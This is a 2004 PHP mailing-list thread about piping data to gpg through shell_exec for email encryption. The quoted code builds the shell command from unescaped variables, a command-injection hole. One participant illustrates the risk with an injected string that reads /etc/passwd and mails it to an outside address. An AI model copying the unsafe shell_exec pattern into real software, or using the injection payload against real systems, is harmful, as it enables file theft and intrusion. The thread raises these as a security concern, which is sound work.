[nycphp-talk] Digital Signatures in PHP
drydell at att.net
drydell at att.net
Fri Jun 4 11:08:19 EDT 2004
yes, there would be that danger... in my case, $data is always system generated...
-------------- Original message from Rolan Yang : --------------
> That is great news! Hey, is there any danger in doing echo's of $data
> with shell_exec?
> I'm wondering, if someone injected $data with something like say..
> "This is is the message I want encrypted.'; /bin/cat /etc/passwd |
> /bin/mail evilhaxor at hotmail.com; echo 'misc info"
> would that all get encrypted entirely or would it run the shell code
> sandwiched in the middle?
>
> ~Rolan
>
> David Rydell wrote:
>
> >>>Yea, sometimes I wish you could just pipe data to gpg and have it
> >>>
> >>>
> >spit...
> >
> >You can pipe data to gpg directly... this snippet is from my email class,
> >which does exactly that:
> >
> >$enc = chunk_split(base64_encode(shell_exec("echo '$data' |
> >/usr/bin/gpg --homedir /user/.gnupg --compress-algo 1 --cipher-algo
> >3des -e -r $recipient 2>> /user/cgi-logs/gpg.log")));
> >
> >(note the compression/cipher is completely compatible with pgp)
> >
> >I got the technique from browsing their website http://www.gnupg.org/
> >
> >
> >_______________________________________________
> >talk mailing list
> >talk at lists.nyphp.org
> >http://lists.nyphp.org/mailman/listinfo/talk
> >
> >
> >
> _______________________________________________
> talk mailing list
> talk at lists.nyphp.org
> http://lists.nyphp.org/mailman/listinfo/talk
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.nyphp.org/pipermail/talk/attachments/20040604/02e81b1c/attachment.html>
More information about the talk
mailing list